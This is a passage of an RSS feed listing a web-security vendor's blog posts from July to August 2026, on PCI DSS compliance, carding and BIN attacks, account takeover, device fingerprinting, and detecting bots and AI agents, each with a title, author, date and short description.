type="image/webp"/></item><item><title>What is SAQ D? Complete Guide for Merchants and Service Providers</title><link>https://cside.com/blog/what-is-saq-d-and-how-to-complete-it</link><guid isPermaLink="true">https://cside.com/blog/what-is-saq-d-and-how-to-complete-it</guid><description>SAQ D is the longest PCI DSS self-assessment questionnaire and applies to the widest scope. Understand who needs it, what it covers, and how to prepare.</description><pubDate>Tue, 18 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+is+SAQ+D%3F+Complete+Guide+for+Merchants+and+Service+Providers&amp;bannerTitle=SAQ+D+Explained&amp;point=Longest+PCI+DSS+SAQ&amp;point=Applies+to+most+e-commerce+merchants&amp;point=Covers+all+12+PCI+DSS+requirements" length="0" type="image/webp"/></item><item><title>What Is That Tracker? A Field Guide to the Domains in Your Network Tab</title><link>https://cside.com/blog/what-is-that-tracker-domain-guide</link><guid isPermaLink="true">https://cside.com/blog/what-is-that-tracker-domain-guide</guid><description>You open DevTools and see requests to doubleclick.net, adnxs.com, clarity.ms, scorecardresearch.com, domains you never added. This guide explains what the most common tracker domains actually are, who operates them, what data they touch, and when an unknown domain in your network tab is a real problem.</description><pubDate>Tue, 18 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><category>security</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+Is+That+Tracker%3F+A+Field+Guide+to+the+Domains+in+Your+Network+Tab&amp;bannerTitle=What+is+that+tracker+domain%3F&amp;point=18+common+tracker+domains+explained&amp;point=Who+operates+each+and+what+data+it+touches&amp;point=When+an+unknown+domain+is+a+real+problem" length="0" type="image/webp"/></item><item><title>What Is Web Tracking? How Websites Identify and Follow Visitors</title><link>https://cside.com/blog/what-is-web-tracking</link><guid isPermaLink="true">https://cside.com/blog/what-is-web-tracking</guid><description>Web tracking is the collection of data about visitors&apos; behavior across websites, using cookies, pixels, fingerprinting, and session-replay scripts. This guide explains how each technique works, who is doing the tracking, what the law requires, and how site owners can see what their own pages are collecting.</description><pubDate>Tue, 18 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><category>security</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+Is+Web+Tracking%3F+How+Websites+Identify+and+Follow+Visitors&amp;bannerTitle=What+is+web+tracking%3F&amp;point=Cookies%2C+pixels%2C+fingerprinting+explained&amp;point=Who+tracks+visitors+and+why&amp;point=How+to+see+tracking+on+your+own+site" length="0" type="image/webp"/></item><item><title>Carding Attack: What It Is and How to Detect the Automation Behind It</title><link>https://cside.com/blog/what-is-a-carding-attack</link><guid isPermaLink="true">https://cside.com/blog/what-is-a-carding-attack</guid><description>A carding attack tests stolen or generated card numbers against your checkout at scale. Understand the attack, spot the browser-layer signature, and stop it.</description><pubDate>Mon, 17 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Carding+Attack%3A+What+It+Is+and+How+to+Detect+the+Automation+Behind+It&amp;bannerTitle=Carding+Attack+Explained&amp;point=Automation+validates+cards+at+scale&amp;point=The+cost+is+more+than+just+fraud&amp;point=Browser-layer+signals+stop+the+attack+early" length="0" type="image/webp"/></item><item><title>Card Not Present Fraud: How CNP Attacks Work and How to Prevent Them</title><link>https://cside.com/blog/what-is-card-not-present-fraud</link><guid isPermaLink="true">https://cside.com/blog/what-is-card-not-present-fraud</guid><description>Card not present fraud drives most online payment losses. Understand how CNP attacks work, the browser signals that expose them, and the controls that stop them.</description><pubDate>Mon, 17 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Card+Not+Present+Fraud%3A+How+CNP+Attacks+Work+and+How+to+Prevent+Them&amp;bannerTitle=Card+Not+Present+Fraud&amp;point=Most+online+payment+loss+is+CNP&amp;point=Gateway+data+is+not+enough&amp;point=Browser+signals+separate+fraud+from+customers" length="0" type="image/webp"/></item><item><title>What is PCI DSS? A Practical Guide to the Payment Card Industry Data Security Standard</title><link>https://cside.com/blog/what-is-pci-dss</link><guid isPermaLink="true">https://cside.com/blog/what-is-pci-dss</guid><description>PCI DSS is the security standard every business handling payment cards must follow. Understand the 12 requirements, compliance levels, and how to prepare.</description><pubDate>Mon, 17 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+is+PCI+DSS%3F+A+Practical+Guide+to+the+Payment+Card+Industry+Data+Security+Standard&amp;bannerTitle=What+is+PCI+DSS%3F&amp;point=12+requirements+across+6+goals&amp;point=Applies+to+anyone+handling+card+data&amp;point=4.0.1+introduced+client-side+controls" length="0" type="image/webp"/></item><item><title>Phia cookie stuffing: Bill Gates&apos; daughter&apos;s app, explained</title><link>https://cside.com/blog/phia-cookie-stuffing-explained</link><guid isPermaLink="true">https://cside.com/blog/phia-cookie-stuffing-explained</guid><description>Bloomberg alleges Phia, co-founded by Phoebe Gates, forced affiliate clicks. How it worked, and six tests merchants can run on their own order data.</description><pubDate>Sat, 15 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Phia+cookie+stuffing%3A+Bill+Gates%27+daughter%27s+app%2C+explained&amp;bannerTitle=Phia+and+the+cookie-stuffing+allegations&amp;point=Forced+affiliate+clicks%2C+explained&amp;point=What+server+logs+cannot+see&amp;point=Six+merchant-side+tests" length="0" type="image/webp"/></item><item><title>PCI DSS Requirements: The 12 Requirements Explained (4.0.1)</title><link>https://cside.com/blog/pci-dss-requirements</link><guid isPermaLink="true">https://cside.com/blog/pci-dss-requirements</guid><description>PCI DSS has 12 requirements grouped under six security goals. Understand what each requires, what changed in 4.0.1, and where most environments have gaps.</description><pubDate>Fri, 14 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=PCI+DSS+Requirements%3A+The+12+Requirements+Explained+%284.0.1%29&amp;bannerTitle=The+12+PCI+DSS+Requirements&amp;point=Full+reference+for+4.0.1&amp;point=What+changed+since+3.2.1&amp;point=Where+audits+get+stuck" length="0" type="image/webp"/></item><item><title>What is a BIN Attack? How to Detect and Stop Automated Card Testing</title><link>https://cside.com/blog/what-is-a-bin-attack</link><guid isPermaLink="true">https://cside.com/blog/what-is-a-bin-attack</guid><description>A BIN attack tests thousands of stolen or generated card numbers against your checkout. Detect the browser-layer signature and stop it before it costs you.</description><pubDate>Fri, 14 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+is+a+BIN+Attack%3F+How+to+Detect+and+Stop+Automated+Card+Testing&amp;bannerTitle=What+is+a+BIN+Attack%3F&amp;point=Card+numbers+tested+at+scale&amp;point=Browser-layer+signals+expose+the+automation&amp;point=Device+fingerprints+stop+the+reuse" length="0" type="image/webp"/></item><item><title>What is an AI Agent? Definition, Examples, and What It Means for Your Website</title><link>https://cside.com/blog/what-is-an-ai-agent</link><guid isPermaLink="true">https://cside.com/blog/what-is-an-ai-agent</guid><description>An AI agent is a system that uses an LLM to complete multi-step tasks autonomously. Understand the definition, examples, and why agents change website security.</description><pubDate>Fri, 14 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+is+an+AI+Agent%3F+Definition%2C+Examples%2C+and+What+It+Means+for+Your+Website&amp;bannerTitle=What+is+an+AI+Agent%3F&amp;point=LLM-driven%2C+task-completing+systems&amp;point=Real-world+examples+in+production&amp;point=Changing+website+traffic+and+security" length="0" type="image/webp"/></item><item><title>Browser Fingerprinting for Fraud Prevention: How It Works and Why It Matters</title><link>https://cside.com/blog/browser-fingerprinting-for-fraud-prevention</link><guid isPermaLink="true">https://cside.com/blog/browser-fingerprinting-for-fraud-prevention</guid><description>Browser fingerprinting produces a stable identifier from dozens of browser properties. Understand how it works, how it differs from device fingerprinting, and where it fits.</description><pubDate>Thu, 13 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Browser+Fingerprinting+for+Fraud+Prevention%3A+How+It+Works+and+Why+It+Matters&amp;bannerTitle=Browser+Fingerprinting&amp;point=Stable+ID+from+dozens+of+browser+signals&amp;point=Different+from+device+fingerprinting&amp;point=Central+to+modern+fraud+stacks" length="0" type="image/webp"/></item><item><title>How to Detect Anthropic Computer Use on Your Website</title><link>https://cside.com/blog/how-to-detect-anthropic-computer-use</link><guid isPermaLink="true">https://cside.com/blog/how-to-detect-anthropic-computer-use</guid><description>Anthropic&apos;s Computer Use agent controls a real browser to complete tasks. Detect the signature at the browser layer before the agent transacts on your site.</description><pubDate>Thu, 13 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+Detect+Anthropic+Computer+Use+on+Your+Website&amp;bannerTitle=Detecting+Anthropic+Computer+Use&amp;point=The+agent+drives+a+real+browser&amp;point=Scripted+precision%2C+not+human+input&amp;point=Browser-layer+signals+expose+it" length="0" type="image/webp"/></item><item><title>What is Account Takeover (ATO)? Definition, Attack Patterns, and Prevention</title><link>https://cside.com/blog/what-is-account-takeover</link><guid isPermaLink="true">https://cside.com/blog/what-is-account-takeover</guid><description>What is ATO? Account takeover (ATO) is one of the most common online fraud vectors. Understand what ATO is, the attack patterns behind it, and how to stop it at the browser layer.</description><pubDate>Thu, 13 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+is+Account+Takeover+%28ATO%29%3F+Definition%2C+Attack+Patterns%2C+and+Prevention&amp;bannerTitle=What+is+Account+Takeover%3F&amp;point=ATO+is+unauthorized+access+to+a+real+account&amp;point=Credential+stuffing+drives+most+attacks&amp;point=Browser-layer+signals+expose+the+attacker" length="0" type="image/webp"/></item><item><title>What is device intelligence? A plain-English guide to how it works</title><link>https://cside.com/blog/what-is-device-intelligence</link><guid isPermaLink="true">https://cside.com/blog/what-is-device-intelligence</guid><description>Device intelligence builds a stable device identifier from browser signals, not cookies, so it survives VPNs, incognito mode, and cookie clearing.</description><pubDate>Wed, 12 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+is+device+intelligence%3F+A+plain-English+guide+to+how+it+works&amp;bannerTitle=What+is+device+intelligence%2C+and+how+does+it+work%3F&amp;point=Stable+device+ID+from+browser+signals&amp;point=Survives+VPNs%2C+incognito%2C+cookie+clearing&amp;point=250%2B+signals+combined+into+one+device+ID" length="0" type="image/webp"/></item><item><title>Transaction and Payment Fraud Detection Software: The Checkout Evidence Gap</title><link>https://cside.com/blog/payment-fraud-detection</link><guid isPermaLink="true">https://cside.com/blog/payment-fraud-detection</guid><description>Payment fraud detection software has to capture browser session evidence at checkout, not after, so merchants can win chargeback disputes later.</description><pubDate>Tue, 11 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Transaction+and+Payment+Fraud+Detection+Software%3A+The+Checkout+Evidence+Gap&amp;bannerTitle=Transaction+and+payment+fraud+detection&amp;point=Captures+device+and+VPN+signals+at+checkout&amp;point=Exports+evidence+in+Visa+CE+3.0+format&amp;point=Flags+AI-agent+and+automated+sessions" length="0" type="image/webp"/></item><item><title>What are device-bound sessions? How they stop session hijacking</title><link>https://cside.com/blog/what-are-device-bound-sessions</link><guid isPermaLink="true">https://cside.com/blog/what-are-device-bound-sessions</guid><description>Device-bound sessions tie an authenticated session to the device that created it, so a stolen token replayed from another device is rejected.</description><pubDate>Tue, 11 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+are+device-bound+sessions%3F+How+they+stop+session+hijacking&amp;bannerTitle=Device-bound+sessions%3A+stop+session+hijacking&amp;point=Protects+the+whole+session+after+login&amp;point=Stolen+tokens+fail+on+a+new+device&amp;point=Hardware+fingerprint+beats+a+copyable+cookie" length="0" type="image/webp"/></item><item><title>What is CTEM? Continuous Threat Exposure Management explained</title><link>https://cside.com/blog/what-is-ctem</link><guid isPermaLink="true">https://cside.com/blog/what-is-ctem</guid><description>CTEM is a continuous security framework for discovering, prioritizing, and validating exposures across your attack surface, including the browser layer.</description><pubDate>Tue, 11 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+is+CTEM%3F+Continuous+Threat+Exposure+Management+explained&amp;bannerTitle=What+is+CTEM%3F+Continuous+Threat+Exposure+Management&amp;point=Five+continuous+stages%2C+not+a+yearly+checklist&amp;point=Client-side+JavaScript+is+the+common+blind+spot&amp;point=Maps+to+PCI+DSS+6.4.3+and+11.6.1" length="0" type="image/webp"/></item><item><title>How to detect bots on your website in 2026</title><link>https://cside.com/blog/how-to-detect-bots</link><guid isPermaLink="true">https://cside.com/blog/how-to-detect-bots</guid><description>Detecting bots in 2026 means combining network, browser, and behavioral signals into one verdict that also flags AI agents like OpenAI Operator.</description><pubDate>Mon, 10 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+detect+bots+on+your+website+in+2026&amp;bannerTitle=How+to+detect+bots+on+your+website+in+2026&amp;point=Combine+network%2C+browser%2C+and+behavior+signals&amp;point=Catch+AI+agents+that+pass+basic+bot+checks&amp;point=One+verdict+from+250%2B+signals+per+session" length="0" type="image/webp"/></item><item><title>What is device fingerprinting? The definitive 2026 guide</title><link>https://cside.com/blog/what-is-device-fingerprinting</link><guid isPermaLink="true">https://cside.com/blog/what-is-device-fingerprinting</guid><description>Device fingerprinting identifies a device from 250+ browser, hardware and network signals that survive cookie-clearing, incognito mode and VPN use.</description><pubDate>Mon, 10 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+is+device+fingerprinting%3F+The+definitive+2026+guide&amp;bannerTitle=What+device+fingerprinting+is+and+how+it+works&amp;point=No+cookie%2C+no+consent+banner+required&amp;point=Survives+incognito%2C+cookie-clearing+and+VPN&amp;point=Detects+ATO%2C+multi-accounting+and+bots" length="0" type="image/webp"/></item><item><title>Fraud prevention software: full platforms vs signal layers explained</title><link>https://cside.com/blog/fraud-prevention-software</link><guid isPermaLink="true">https://cside.com/blog/fraud-prevention-software</guid><description>Fraud prevention software splits into transaction scoring platforms and browser-layer signal providers. Here is how each fits your fraud stack.</description><pubDate>Fri, 07 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Fraud+prevention+software%3A+full+platforms+vs+signal+layers+explained&amp;bannerTitle=Fraud+prevention+software%3A+platforms+vs+signal+layers&amp;point=Full+platforms+score+risk+after+the+event&amp;point=Signal+layers+catch+fraud+before+it+fires&amp;point=250%2B+browser+signals+feed+your+rules+engine" length="0" type="image/webp"/></item><item><title>Password sharing detection tools for SaaS: what works and what doesn&apos;t</title><link>https://cside.com/blog/password-sharing-detection-tools</link><guid isPermaLink="true">https://cside.com/blog/password-sharing-detection-tools</guid><description>Device fingerprinting catches colleagues sharing one SaaS login across multiple desktops, the abuse that IP-based and authentication-only tools miss.</description><pubDate>Fri, 07 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Password+sharing+detection+tools+for+SaaS%3A+what+works+and+what+doesn%27t&amp;bannerTitle=Password+sharing+detection+for+SaaS&amp;point=Catch+one+login+across+many+devices&amp;point=IP+and+session+limits+miss+this&amp;point=Silent%2C+no+friction+for+real+users" length="0" type="image/webp"/></item><item><title>What is account takeover fraud? Definition, mechanics, and prevention</title><link>https://cside.com/blog/what-is-account-takeover-fraud</link><guid isPermaLink="true">https://cside.com/blog/what-is-account-takeover-fraud</guid><description>Account takeover fraud uses stolen credentials to hijack real accounts. Learn how credential stuffing attacks work and how to detect them at login.</description><pubDate>Fri, 07 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+is+account+takeover+fraud%3F+Definition%2C+mechanics%2C+and+prevention&amp;bannerTitle=What+is+account+takeover+fraud%3F&amp;point=Catches+ATO+at+the+browser%2C+before+login&amp;point=Flags+credential+stuffing+and+proxy+logins&amp;point=Real-time+risk+verdict+at+authentication" length="0" type="image/webp"/></item><item><title>8 best FingerprintJS alternatives in 2026, cside compared</title><link>https://cside.com/blog/fingerprintjs-alternative</link><guid isPermaLink="true">https://cside.com/blog/fingerprintjs-alternative</guid><description>Looking for a FingerprintJS alternative? Compare the 8 best options for 2026, ranked, with cside first for device ID plus AI agent and VPN detection.</description><pubDate>Thu, 06 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=8+best+FingerprintJS+alternatives+in+2026%2C+cside+compared&amp;bannerTitle=8+FingerprintJS+alternatives+in+2026&amp;point=cside+ranked+%231+FingerprintJS+alternative&amp;point=Device+ID+plus+AI+agent+and+VPN+detection&amp;point=Free+tier%3A+1%2C000+API+calls+per+month" length="0" type="image/webp"/></item><item><title>iGaming fraud prevention: AI agents, ATO, and PCI compliance</title><link>https://cside.com/blog/igaming-fraud-prevention</link><guid isPermaLink="true">https://cside.com/blog/igaming-fraud-prevention</guid><description>iGaming fraud prevention spans AI agent promo abuse, account takeover on player accounts, and PCI DSS 4.0.1 script monitoring on deposit pages.</description><pubDate>Thu, 06 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=iGaming+fraud+prevention%3A+AI+agents%2C+ATO%2C+and+PCI+compliance&amp;bannerTitle=iGaming+fraud+prevention%3A+agents%2C+ATO%2C+PCI&amp;point=Detects+named+AI+agents+before+signup&amp;point=Flags+multi-account+device+clusters&amp;point=PCI+DSS+4.0.1+validated+script+monitoring" length="0" type="image/webp"/></item><item><title>How to block AI agents on your website: a practical implementation guide</title><link>https://cside.com/blog/how-to-block-ai-agents</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-ai-agents</guid><description>AI agents pass WAF and CDN filters because they run in real browsers. Blocking them takes a browser-layer script that reads signals inside the session.</description><pubDate>Wed, 05 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+block+AI+agents+on+your+website%3A+a+practical+implementation+guide&amp;bannerTitle=How+to+block+AI+agents+on+your+website&amp;point=WAFs+and+CDNs+miss+browser-based+AI+agents&amp;point=Reads+canvas%2C+cadence+and+cursor+signals&amp;point=Block%2C+challenge%2C+or+allow+per+session" length="0" type="image/webp"/></item><item><title>How to dispute a chargeback as a merchant: evidence and process guide</title><link>https://cside.com/blog/how-to-dispute-a-chargeback-as-a-merchant</link><guid isPermaLink="true">https://cside.com/blog/how-to-dispute-a-chargeback-as-a-merchant</guid><description>Disputing a chargeback means filing a representment package before your card network deadline, backed by delivery proof and device evidence.</description><pubDate>Wed, 05 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+dispute+a+chargeback+as+a+merchant%3A+evidence+and+process+guide&amp;bannerTitle=How+to+dispute+a+chargeback+as+a+merchant&amp;point=Visa+30%2C+Mastercard+45%2C+Amex+20-day+windows&amp;point=Device+fingerprint+evidence+for+Visa+CE+3.0&amp;point=Export+dispute+evidence+in+seconds" length="0" type="image/webp"/></item><item><title>What is a fraud detection API? How it works and what to look for</title><link>https://cside.com/blog/fraud-detection-api</link><guid isPermaLink="true">https://cside.com/blog/fraud-detection-api</guid><description>A fraud detection API returns a device fingerprint, AI agent flag, VPN status, and risk score in real time before a login or checkout completes.</description><pubDate>Tue, 04 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+is+a+fraud+detection+API%3F+How+it+works+and+what+to+look+for&amp;bannerTitle=What+a+fraud+detection+API+returns&amp;point=Device+ID%2C+AI+agent%2C+VPN+and+risk+in+one+call&amp;point=Reads+browser+signals+before+checkout&amp;point=Free+tier%3A+1%2C000+API+calls+per+month" length="0" type="image/webp"/></item><item><title>Multi-accounting detection software: stop bonus abuse and referral fraud</title><link>https://cside.com/blog/multi-accounting-detection-software</link><guid isPermaLink="true">https://cside.com/blog/multi-accounting-detection-software</guid><description>Multi-accounting detection software links accounts to the same device fingerprint, catching bonus abuse and referral fraud before payouts go out.</description><pubDate>Tue, 04 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Multi-accounting+detection+software%3A+stop+bonus+abuse+and+referral+fraud&amp;bannerTitle=Multi-accounting+detection+software&amp;point=Links+accounts+by+device+fingerprint&amp;point=Catches+bonus+abuse+and+referral+fraud&amp;point=Free+plan%3A+1%2C000+API+calls+a+month" length="0" type="image/webp"/></item><item><title>Device fingerprinting solutions: how they work and what to look for</title><link>https://cside.com/blog/device-fingerprinting-solutions</link><guid isPermaLink="true">https://cside.com/blog/device-fingerprinting-solutions</guid><description>How device fingerprinting solutions identify devices with browser, hardware and network signals that survive cookie-clearing, incognito and VPN use.</description><pubDate>Mon, 03 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Device+fingerprinting+solutions%3A+how+they+work+and+what+to+look+for&amp;bannerTitle=Device+fingerprinting+that+survives+cookie-clearing+and+VPNs&amp;point=Survives+cookie-clearing%2C+incognito+and+VPN&amp;point=250%2B+device%2C+network+and+behavioral+signals&amp;point=Fraud-ready%3A+no+cookie%2C+no+consent+banner" length="0" type="image/webp"/></item><item><title>iGaming fraud detection: bonus abuse, ATO, and PCI compliance in 2026</title><link>https://cside.com/blog/igaming-fraud-detection</link><guid isPermaLink="true">https://cside.com/blog/igaming-fraud-detection</guid><description>iGaming fraud spans AI-agent bonus abuse, wallet account takeover, VPN multi-accounting, and deposit-page skimming. Here is how to detect each one.</description><pubDate>Mon, 03 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=iGaming+fraud+detection%3A+bonus+abuse%2C+ATO%2C+and+PCI+compliance+in+2026&amp;bannerTitle=iGaming+fraud+detection+in+2026&amp;point=Bonus+abuse%2C+ATO%2C+skimming+in+one+layer&amp;point=Browser-layer+signals+beat+IP-based+rules&amp;point=PCI+DSS+6.4.3+and+11.6.1+script+monitoring" length="0" type="image/webp"/></item><item><title>PCI DSS compliance cost in 2026: what you will actually pay</title><link>https://cside.com/blog/pci-dss-compliance-cost</link><guid isPermaLink="true">https://cside.com/blog/pci-dss-compliance-cost</guid><description>PCI DSS compliance cost runs from about $5,000 a year for small merchants to over $5 million for enterprises, and automation cuts the biggest drivers.</description><pubDate>Mon, 03 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=PCI+DSS+compliance+cost+in+2026%3A+what+you+will+actually+pay&amp;bannerTitle=PCI+DSS+compliance+cost+in+2026&amp;point=%245K+for+SMEs+to+%245M%2B+for+enterprises&amp;point=Automates+PCI+DSS+6.4.3+and+11.6.1&amp;point=From+%2499%2Fmo+vs+15-30+engineering+days" length="0" type="image/webp"/></item><item><title>Bot protection in 2026: why browser-layer detection catches what WAFs miss</title><link>https://cside.com/blog/bot-protection</link><guid isPermaLink="true">https://cside.com/blog/bot-protection</guid><description>AI agents run inside real Chromium browsers and slip past WAFs. Browser-layer detection reads canvas entropy and session cadence to catch them.</description><pubDate>Fri, 31 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Bot+protection+in+2026%3A+why+browser-layer+detection+catches+what+WAFs+miss&amp;bannerTitle=Browser-layer+bot+protection+in+2026&amp;point=See+what+network-layer+tools+cannot&amp;point=Identify+named+AI+agents+by+their+signals&amp;point=Set+block%2C+allow%2C+or+challenge+per+page" length="0" type="image/webp"/></item><item><title>Chargeback fraud prevention: how device evidence wins disputes in 2026</title><link>https://cside.com/blog/chargeback-fraud-prevention</link><guid isPermaLink="true">https://cside.com/blog/chargeback-fraud-prevention</guid><description>Chargeback fraud prevention hinges on device evidence captured at checkout, the proof Visa CE 3.0 accepts when you contest a card-not-present dispute.</description><pubDate>Fri, 31 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Chargeback+fraud+prevention%3A+how+device+evidence+wins+disputes+in+2026&amp;bannerTitle=Win+chargeback+disputes+with+device+evidence&amp;point=Capture+device+evidence+at+checkout&amp;point=Export+CE+3.0+dispute+packets+in+seconds&amp;point=Contest+card-not-present+chargebacks" length="0" type="image/webp"/></item><item><title>Account takeover solutions: understanding the category before you build a shortlist</title><link>https://cside.com/blog/account-takeover-solutions</link><guid isPermaLink="true">https://cside.com/blog/account-takeover-solutions</guid><description>Account takeover solutions span four layers: WAF, MFA, browser device intelligence, and behavioral analytics. No single vendor covers them all.</description><pubDate>Thu, 30 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Account+takeover+solutions%3A+understanding+the+category+before+you+build+a+shortlist&amp;bannerTitle=Account+takeover+solutions%3A+the+four+detection+layers&amp;point=Four+layers%2C+no+vendor+covers+them+all&amp;point=The+browser+layer+is+the+common+gap&amp;point=Catch+credential+stuffing+and+AI+agents" length="0" type="image/webp"/></item><item><title>Best account sharing detection software 2026: an honest comparison</title><link>https://cside.com/blog/best-account-sharing-detection-software</link><guid isPermaLink="true">https://cside.com/blog/best-account-sharing-detection-software</guid><description>Device fingerprinting counts how many distinct devices sit behind one login, catching the seat abuse that IP-based tools and MFA controls miss.</description><pubDate>Thu, 30 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Best+account+sharing+detection+software+2026%3A+an+honest+comparison&amp;bannerTitle=Account+sharing+detection+software%2C+compared&amp;point=Counts+distinct+devices+per+account&amp;point=Passive%2C+no+friction+for+real+users&amp;point=Persists+through+VPN+and+incognito" length="0" type="image/webp"/></item><item><title>Fake account detection: why email verification is not enough in 2026</title><link>https://cside.com/blog/fake-account-detection</link><guid isPermaLink="true">https://cside.com/blog/fake-account-detection</guid><description>Email verification and CAPTCHA confirm an endpoint, not a person. Device fingerprinting is what catches fake account signups at registration.</description><pubDate>Thu, 30 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Fake+account+detection%3A+why+email+verification+is+not+enough+in+2026&amp;bannerTitle=Fake+account+detection%3A+beyond+email+verification&amp;point=Email+and+CAPTCHA+verify+a+device%2C+not+a+person&amp;point=Device+fingerprints+link+fake+signups&amp;point=Catches+anti-detect+browsers+at+signup" length="0" type="image/webp"/></item><item><title>Best VPN detection software 2026: TLS handshake fingerprint TLS fingerprinting vs IP blocklists</title><link>https://cside.com/blog/best-vpn-detection-software</link><guid isPermaLink="true">https://cside.com/blog/best-vpn-detection-software</guid><description>The best VPN detection tools use TLS handshake fingerprint TLS fingerprinting to catch the residential proxies and VPN configurations that IP blocklists miss entirely.</description><pubDate>Wed, 29 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Best+VPN+detection+software+2026%3A+TLS+handshake+fingerprint+TLS+fingerprinting+vs+IP+blocklists&amp;bannerTitle=VPN+detection%3A+TLS+handshake+fingerprint+fingerprinting+vs+IP+blocklists&amp;point=TLS+handshake+fingerprint+TLS+fingerprinting+beats+IP+blocklists&amp;point=Catches+residential+proxies+IP+lists+miss&amp;point=Free+tier%3A+1%2C000+API+calls+per+month" length="0" type="image/webp"/></item><item><title>PCI DSS compliance checklist 2026: Requirements 6.4.3 and 11.6.1 explained</title><link>https://cside.com/blog/pci-dss-compliance-checklist</link><guid isPermaLink="true">https://cside.com/blog/pci-dss-compliance-checklist</guid><description>Requirements 6.4.3 and 11.6.1 became mandatory in March 2025. Here is what belongs on a modern PCI DSS compliance checklist, and how to automate it.</description><pubDate>Wed, 29 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=PCI+DSS+compliance+checklist+2026%3A+Requirements+6.4.3+and+11.6.1+explained&amp;bannerTitle=PCI+DSS+compliance+checklist%3A+6.4.3+and+11.6.1&amp;point=6.4.3+and+11.6.1%3A+mandatory+since+March+2025&amp;point=Script+inventory%2C+integrity%2C+change+detection&amp;point=Automate+the+client-side+controls" length="0" type="image/webp"/></item><item><title>Card testing fraud prevention software: how to stop automated card validation at 